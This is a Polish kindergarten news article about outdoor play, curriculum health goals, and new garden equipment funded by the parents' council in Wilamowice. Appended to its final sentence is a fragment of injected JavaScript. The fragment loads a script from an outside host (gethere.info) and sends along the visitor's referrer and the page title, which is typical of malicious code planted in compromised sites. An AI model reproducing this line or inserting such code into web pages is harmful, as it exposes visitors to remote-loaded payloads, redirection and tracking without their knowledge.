Ogród przedszkolny sprzymierzeńcem wszechstronnego rozwoju dziecka.

,,W zdrowym ciele zdrowy duch” tak powiada stare przysłowie. Co robić by w świecie pełnym zagrożeń cywilizacyjnych zapewnić ciału zdrowie i prawidłowy rozwój ? Od najmłodszych lat poznajemy zasady zdrowego żywienia, spędzania wolnego czasu,troszczymy się o ład
i porządek własnego otoczenia. Wpierw rodzice a później przedszkole i szkoła realizując wytyczne zawarte w programach nauczania przekazują dzieciom wiedzę dotyczącą zdrowego stylu życia. Znowelizowana podstawa programowa wychowania przedszkolnego zakłada, iż dziecko kończące przedszkole i rozpoczynające naukę w szkole podstawowej:
1. potrafi dbać o swoje zdrowie ,zaczyna orientować się w podstawowych zasadach zdrowego żywienia,
2. dostrzega związek pomiędzy chorobą a leczeniem, poddaje się leczeniu i wie np. że podawanie zastrzyków i przyjmowanie lekarstw w stanie choroby są konieczne,
3. jest sprawne fizycznie lub jest sprawne w miarę swoich możliwości, jeżeli jest dzieckiem mniej sprawnym ruchowo
4. uczestniczy w zajęciach ruchowych, w zabawach i grach w ogrodzie przedszkolnym, parku , na boisku, w sali gimnastycznej.
W trosce o prawidłowy rozwój psychoruchowy oraz przebieg wychowania i kształcenia w wieku przedszkolnym zaleca się by dziecko w czasie pobytu w przedszkolu co najmniej jedną piątą , a młodsze dzieci jedną czwartą czasu tam spędzanego przebywało na świeżym powietrzu , bez względu na porę roku. Zaleca się by nauczyciele organizowali zajęcia w ogrodzie przedszkolnym , na boisku, w parku. W tych warunkach można przeprowadzać obserwacje przyrodnicze, prace gospodarcze, porządkowe czy ogrodnicze. Otwarta przestrzeń sprzyja organizowaniu gier i zabaw. Przedszkole działające w ramach Zespołu Szkolno – Przedszkolnego w Wilamowicach wychodząc naprzeciw upodobaniom swoich podopiecznych, w trosce o ich prawidłowy rozwój i organizacje pobytu dziecka w przedszkolu zgodną z wytycznymi ,,Podstawy programowej”wzbogaciło ogród przedszkolny o nowy sprzęt. Zakupiono ,,pociąg”, który służy nie tylko jako pojazd , domek , łódź piracka ,wszystko w zależności od fantazji dzieci , ale ze względu na swoją wielkość może być wykorzystany do prowadzenia zajęć z całą grupą.
W ogrodzie zamontowano również dwustronną tablicę do rysowania kredą , huśtawki dla młodszych dzieci.
Zakup sprzętu wspomogła Rada Rodziców ZSP Wilamowice przekazując na ten cel kwotę 1.200 złotych .
Dla przedszkolaków pobyt w ogrodzie to wielka frajda a zajęcia tam organizowane z pewnością pozytywnie wpłyną nie tylko na ich zdrowie ale ogólny rozwój .s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”;